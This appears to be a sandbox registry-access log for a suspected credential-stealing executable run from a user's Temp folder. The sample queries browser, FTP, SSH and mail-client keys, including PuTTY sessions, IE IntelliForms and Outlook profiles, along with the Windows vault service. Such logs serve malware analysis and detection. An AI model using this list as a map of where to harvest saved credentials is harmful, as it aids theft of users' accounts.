HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Xml__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Deployment__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.Accessibility__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Security__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1ca07f81\172a5a26 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|TRIP2323232.exe HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|TRIP2323232.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|TRIP2323232.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\Global HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\Global HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\Global HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1ca07f81\722f814 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it-IT_b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\40dcb014 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it_b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\1ffc8ca7 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\4ad60644\6f323003 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\235dd0a9 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\9e47f51 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox HKEY_LOCAL_MACHINE\SOFTWARE\ComodoGroup\IceDragon\Setup HKEY_LOCAL_MACHINE\SOFTWARE\Apple Computer, Inc.\Safari HKEY_LOCAL_MACHINE\SOFTWARE\K-Meleon HKEY_LOCAL_MACHINE\SOFTWARE\mozilla.org\SeaMonkey HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\SeaMonkey HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Flock HKEY_CURRENT_USER\Software\QtWeb.NET\QtWeb Internet Browser\AutoComplete HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 HKEY_LOCAL_MACHINE\SOFTWARE\8pecxstudios\Cyberfox86 HKEY_LOCAL_MACHINE\SOFTWARE\8pecxstudios\Cyberfox HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Pale Moon HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Waterfox HKEY_CURRENT_USER\Software\LinasFTP\Site Manager HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings HKEY_CURRENT_USER\Software\Ghisler\Total Commander HKEY_CURRENT_USER\Software HKEY_CURRENT_USER\Software\Adobe HKEY_CURRENT_USER\Software\AppDataLow HKEY_CURRENT_USER\Software\JavaSoft HKEY_CURRENT_USER\Software\Macromedia HKEY_CURRENT_USER\Software\Microsoft HKEY_CURRENT_USER\Software\Netscape HKEY_CURRENT_USER\Software\ODBC HKEY_CURRENT_USER\Software\Policies HKEY_CURRENT_USER\Software\Wow6432Node HKEY_CURRENT_USER\Software\Classes HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts HKEY_CURRENT_USER\Software\Bitvise\BvSshClient HKEY_CURRENT_USER\Software\VanDyke\SecureFX HKEY_LOCAL_MACHINE\Software\NCH Software\Fling\Accounts HKEY_CURRENT_USER\Software\NCH Software\Fling\Accounts HKEY_LOCAL_MACHINE\Software\NCH Software\ClassicFTP\FTPAccounts HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions HKEY_LOCAL_MACHINE\Software\SimonTatham\PuTTY\Sessions HKEY_LOCAL_MACHINE\Software\9bis.com\KiTTY\Sessions HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Thunderbird HKEY_CURRENT_USER\Software\IncrediMail\Identities HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities HKEY_CURRENT_USER\Software\Martin Prikryl HKEY_LOCAL_MACHINE\Software\Martin Prikryl HKEY_LOCAL_MACHINE\SOFTWARE\Postbox\Postbox HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\FossaMail HKEY_CURRENT_USER\Software\WinChips\UserAccounts HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook HKEY_CURRENT_USER\SOFTWARE\flaska.net\trojita HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanWorkstation\Parameters HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\Parameters\RpcCacheTimeout HKEY_LOCAL_MACHINE\\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xd0\x9d\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xd1\x9e\xef\xbf\xbd\xd0\x8b\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xd0\x99\xef\xbf\xbd\xef\xbf\xbd\xd1\x8f\xef\xbf\xbd\xef\xbf\xbd HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir HKEY_USERS\S-1-5-18 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData HKEY_USERS\.DEFAULT\Environment HKEY_USERS\.DEFAULT\Volatile Environment HKEY_USERS\.DEFAULT\Volatile Environment\0 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeARMservice HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeARMservice\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeARMservice\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeARMservice\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeARMservice\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeARMservice\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeARMservice\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeARMservice\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeARMservice\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeARMservice\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeFlashPlayerUpdateSvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeFlashPlayerUpdateSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeFlashPlayerUpdateSvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeFlashPlayerUpdateSvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeFlashPlayerUpdateSvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeFlashPlayerUpdateSvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeFlashPlayerUpdateSvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeFlashPlayerUpdateSvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeFlashPlayerUpdateSvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeFlashPlayerUpdateSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ALG HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ALG\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ALG\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ALG\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ALG\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ALG\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ALG\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ALG\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ALG\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ALG\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\aspnet_state HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\aspnet_state\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\aspnet_state\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\aspnet_state\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\aspnet_state\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\aspnet_state\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\aspnet_state\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\aspnet_state\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\aspnet_state\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\aspnet_state\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\DependOnService 